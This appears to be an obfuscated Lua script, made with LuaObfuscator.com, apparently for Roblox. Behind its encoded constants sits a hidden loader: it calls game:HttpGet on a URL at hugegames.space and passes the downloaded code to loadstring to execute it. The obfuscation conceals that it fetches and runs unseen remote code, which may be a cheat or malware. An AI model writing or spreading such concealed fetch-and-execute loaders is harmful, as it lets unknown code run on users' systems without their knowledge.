--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31) if (v1(v31,2)==79) then local v70=0;while true do if (v70==0) then v20=v0(v3(v31,1,1));return "";end end else local v71=0;local v72;while true do if (0==v71) then v72=v2(v0(v31,16));if v20 then local v101=v5(v72,v20);v20=nil;return v101;else return v72;end break;end end end end);v21=nil;v18=1;end if (v18==2) then function v23() local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v24=nil;function v24() local v34=0 -0 ;local v35;local v36;local v37;local v38;while true do if (v34==((1497 -(282 + 595)) -(555 + 64))) then return (v38 * (16778147 -(857 + 74))) + (v37 * (66104 -(367 + 201))) + (v36 * (1183 -(214 + 713))) + v35 ;end if (v34==0) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 );v19=v19 + 2 + 2 ;v34=(1638 -(1523 + 114)) + 0 ;end end end v25=nil;v18=3;end if (v18==5) then v30=nil;function v30(v39,v40,v41) local v42=0;local v43;local v44;local v45;while true do if (v42==0) then v43=v39[1];v44=v39[2];v42=1;end if (v42==1) then v45=v39[3];return function(...) local v79=v43;local v80=v44;local v81=v45;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v95=0,v87 do if (v95>=v81) then v85[v95-v81 ]=v86[v95 + 1 ];else v89[v95]=v86[v95 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=3) then if (v92<=1) then if (v92>0) then do return;end else local v109=v91[2];local v110,v111=v82(v89[v109](v13(v89,v109 + 1 ,v91[3])));v84=(v111 + v109) -1 ;local v112=0;for v130=v109,v84 do v112=v112 + 1 ;v89[v130]=v110[v112];end end elseif (v92==2) then v89[v91[2]]();else local v113=0;local v114;local v115;local v116;local v117;local v118;while true do if (v113==5) then v91=v79[v83];v118=v91[2];v89[v118]=v89[v118](v13(v89,v118 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v113=6;end if (v113==2) then v118=v91[2];v117=v89[v91[3]];v89[v118 + 1 ]=v117;v89[v118]=v117[v91[4]];v83=v83 + 1 ;v113=3;end if (v113==3) then v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v118=v91[2];v113=4;end if (v113==0) then v114=nil;v115,v116=nil;v117=nil;v118=nil;v89[v91[2]]=v41[v91[3]];v113=1;end if (v113==1) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v41[v91[3]];v83=v83 + 1 ;v91=v79[v83];v113=2;end if (v113==6) then v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];do return;end break;end if (v113==4) then v115,v116=v82(v89[v118](v13(v89,v118 + 1 ,v91[3])));v84=(v116 + v118) -1 ;v114=0;for v154=v118,v84 do local v155=0;while true do if (v155==0) then v114=v114 + 1 ;v89[v154]=v115[v114];break;end end end v83=v83 + 1 ;v113=5;end end end elseif (v92<=5) then if (v92>4) then local v119=0;local v120;while true do if (v119==0) then v120=v91[2];v89[v120]=v89[v120](v13(v89,v120 + 1 ,v84));break;end end else v89[v91[2]]=v41[v91[3]];end elseif (v92==6) then local v123=v91[2];local v124=v89[v91[3]];v89[v123 + 1 ]=v124;v89[v123]=v124[v91[4]];else v89[v91[2]]=v91[3];end v83=v83 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==4) then v28=nil;function v28(...) return {...},v12("#",...);end v29=nil;function v29() local v46=0 -0 ;local v47;local v48;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v46~=(1 + 0)) then else v49=nil;v50=nil;v46=2;end if (v46==(0 + 0)) then v47=0 + 0 ;v48=nil;v46=1 -0 ;end if (4==v46) then while true do if (v47==(0 + 0)) then local v98=1709 -(71 + 1638) ;while true do if (v98~=(0 -0)) then else v48=0 + 0 ;v49=nil;v98=4 -3 ;end if (v98~=(1 + 0)) then else v47=1 + 0 ;break;end end end if (v47~=(7 -4)) then else v54=nil;while true do local v106=0 + 0 ;local v107;while true do if (v106~=0) then else v107=0;while true do if (v107==(1131 -(87 + 1043))) then if (v48==(448 -(10 + 438))) then local v156=0 + 0 ;local v157;while true do if (v156==(811 -(569 + 242))) then v157=0 -0 ;while true do if (v157~=(2 -1)) then else v51={};v48=1 + 0 ;break;end if (v157==(0 + 0)) then v49={};v50={};v157=1252 -(721 + 530) ;end end break;end end end if (v48==2) then local v158=1271 -(945 + 326) ;while true do if (v158==(1181 -(1123 + 57))) then for v164=1 + 0 ,v24() do local v165=254 -(163 + 91) ;local v166;while true do if (v165==(1930 -(1869 + 61))) then v166=v22();if (v21(v166,1,1)~=(0 + 0)) then else local v172=0;local v173;local v174;local v175;local v176;while true do if (v172==(6 -4)) then while true do if (v173==1) then local v182=1500 -(1408 + 92) ;while true do if (v182==0) then v176={v23(),v23(),nil,nil};if (v174==(1474 -(1329 + 145))) then local v187=971 -(140 + 831) ;local v188;local v189;local v190;while true do if (v187==(1851 -(1409 + 441))) then v190=nil;while true do if (v188~=(718 -(15 + 703))) then else local v197=0 + 0 ;while true do if (v197==(438 -(262 + 176))) then v189=0 + 0 ;v190=nil;v197=1;end if (v197~=(1 + 0)) then else v188=1722 -(345 + 1376) ;break;end end end if (v188~=(689 -(198 + 490))) then else while true do if (v189==(0 -0)) then v190=0 -0 ;while true do if (v190~=(1206 -(696 + 510))) then else v176[5 -2 ]=v23();v176[1326 -(1249 + 73) ]=v23();break;end end break;end end break;end end break;end if (v187==(1262 -(1091 + 171))) then v188=0 + 0 ;v189=nil;v187=1;end end elseif (v174==(1146 -(466 + 679))) then v176[9 -6 ]=v24();elseif (v174==(6 -4)) then v176[6 -3 ]=v24() -(2^16) ;elseif (v174==(377 -(123 + 251))) then local v198=0 -0 ;local v199;local v200;while true do if (v198==(0 -0)) then local v201=0 + 0 ;while true do if (v201~=(698 -(208 + 490))) then else v199=0 + 0 ;v200=nil;v201=1 + 0 ;end if ((837 -(660 + 176))==v201) then v198=2 -1 ;break;end end end if (v198~=(1 + 0)) then else while true do if (v199==(202 -(14 + 188))) then v200=0;while true do if (0~=v200) then else v176[587 -(57 + 527) ]=v24() -((677 -(534 + 141))^16) ;v176[4]=v23();break;end end break;end end break;end end end v182=1428 -(41 + 1386) ;end if (v182~=(1 + 0)) then else v173=2;break;end end end if (v173==(0 + 0)) then v174=v21(v166,2 + 0 ,3);v175=v21(v166,11 -7 ,172 -(122 + 44) );v173=1 -0 ;end if (v173==(6 -3)) then if (v21(v175,4 -1 ,9 -6 )==(1 + 0)) then v176[11 -7 ]=v54[v176[1 + 3 ]];end v49[v164]=v176;break;end if (v173==(2 + 0)) then local v184=65 -(30 + 35) ;while true do if (v184~=(1 + 0)) then else v173=1260 -(1043 + 214) ;break;end if (v184~=(0 -0)) then else if (v21(v175,1 + 0 ,1)==(397 -(115 + 281))) then v176[2]=v54[v176[4 -2 ]];end if (v21(v175,2 + 0 ,4 -2 )~=(3 -2)) then else v176[3]=v54[v176[7 -4 ]];end v184=581 -(361 + 219) ;end end end end break;end if (v172~=0) then else v173=320 -(53 + 267) ;v174=nil;v172=1 + 0 ;end if (v172==(868 -(550 + 317))) then v175=nil;v176=nil;v172=2;end end end break;end end end v48=3;break;end if (v158==(413 -(15 + 398))) then for v167=983 -(18 + 964) ,v53 do local v168=0 -0 ;local v169;local v170;local v171;while true do if (0~=v168) then else v169=0 -0 ;v170=nil;v168=1;end if (v168~=(2 -1)) then else v171=nil;while true do if (v169==1) then if (v170==1) then v171=v22()~=(285 -(134 + 151)) ;elseif (v170==(1667 -(970 + 695))) then v171=v25();elseif (v170~=3) then else v171=v26();end v54[v167]=v171;break;end if ((0 -0)==v169) then local v179=0 + 0 ;while true do if (v179~=0) then else v170=v22();v171=nil;v179=851 -(20 + 830) ;end if (v179==(1991 -(582 + 1408))) then v169=3 -2 ;break;end end end end break;end end end v52[3 -0 ]=v22();v158=3 -2 ;end end end break;end if (v107==(738 -(542 + 196))) then local v133=1824 -(1195 + 629) ;while true do if (v133~=(0 -0)) then else if (v48==(2 + 1)) then local v162=241 -(187 + 54) ;local v163;while true do if (v162==(780 -(162 + 618))) then v163=0 -0 ;while true do if (v163==(1551 -(1126 + 425))) then local v177=0;while true do if (v177==(0 + 0)) then for v180=3 -2 ,v24() do v50[v180-(1 + 0) ]=v29();end return v52;end end end end break;end end end if ((1122 -(118 + 1003))~=v48) then else v52={v49,v50,nil,v51};v53=v24();v54={};v48=1 + 1 ;end v133=1637 -(1373 + 263) ;end if (v133~=(4 -3)) then else v107=1 + 0 ;break;end end end end break;end end end break;end if ((979 -(553 + 424))~=v47) then else local v99=0;while true do if ((0 -0)~=v99) then else v52=nil;v53=nil;v99=1;end if (v99~=(1001 -(451 + 549))) then else v47=1 + 2 ;break;end end end if (v47==(1 -0)) then local v100=0;while true do if (v100~=(0 -0)) then else v50=nil;v51=nil;v100=1;end if (v100==(1385 -(746 + 638))) then v47=1 + 1 ;break;end end end end break;end if (v46==(2 + 0)) then v51=nil;v52=nil;v46=4 -1 ;end if ((344 -(218 + 123))~=v46) then else v53=nil;v54=nil;v46=3 + 1 ;end end end v18=5;end if (1==v18) then function v21(v55,v56,v57) if v57 then local v73=(v55/(((1 + 3) -2)^(v56-(2 -1))))%((5 -3)^(((v57-(2 -1)) -(v56-(1 + 0))) + ((340 -(144 + 192)) -3))) ;return v73-(v73%(754 -(239 + (760 -246)))) ;else local v74=0 + 0 ;local v75;while true do if (v74==(0 + 0)) then v75=(1331 -(797 + 532))^(v56-(1 -0)) ;return (((v55%(v75 + v75))>=v75) and (1 + 0)) or (238 -((280 -(42 + 174)) + 174)) ;end end end end v22=nil;function v22() local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;v18=2;end if (v18==3) then function v25() local v59=0;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v59==(1 + 0)) then v62=(1899 -(260 + 1638)) + 0 ;v63=(v21(v61,1 + 0 ,9 + 11 ) * ((1506 -(363 + 1141))^(1645 -(1565 + 48)))) + v60 ;v59=1582 -((1623 -(382 + 58)) + 397) ;end if (v59==(8 -(616 -(602 + 9)))) then if (v64==0) then if (v63==(267 -(176 + 91))) then return v65 * (0 -0) ;else local v108=0 -(1189 -(449 + 740)) ;while true do if (v108==(0 + 0)) then v64=1;v62=0 + 0 ;break;end end end elseif (v64==((12902 -8880) -(1913 + (934 -(826 + 46))))) then return ((v63==(0 + 0)) and (v65 * (1/(0 -0)))) or (v65 * NaN) ;end return v8(v65,v64-1023 ) * (v62 + (v63/((1935 -((1512 -(245 + 702)) + 1368))^(195 -143)))) ;end if (v59==(1661 -(1477 + (581 -397)))) then v60=v24();v61=v24();v59=1 -0 ;end if (v59==(2 + 0)) then v64=v21(v61,877 -(564 + 243 + 49) ,10 + 21 );v65=((v21(v61,54 -22 )==(2 -1)) and  -(305 -(244 + 60))) or (1 + 0) ;v59=479 -(41 + 435) ;end end end v26=nil;function v26(v66) local v67=0 -0 ;local v68;local v69;while true do if (v67==2) then v69={};for v93=2 -1 , #v68 do v69[v93]=v2(v1(v3(v68,v93,v93)));end v67=1208 -((2365 -(1404 + 59)) + 303) ;end if (v67==0) then v68=nil;if  not v66 then v66=v24();if (v66==(0 -(0 -0))) then return "";end end v67=2 -1 ;end if (v67==(1 + (0 -0))) then v68=v3(v16,v19,(v19 + v66) -((2456 -(468 + 297)) -(1121 + 569)) );v19=v19 + v66 ;v67=216 -(22 + 192) ;end if (v67==(686 -((1045 -(334 + 228)) + 200))) then return v6(v69);end end end v27=v24;v18=4;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F6875676567616D65732E73706163652F3132663635633366393234626630386432336234666230342E6C756100083O0012033O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
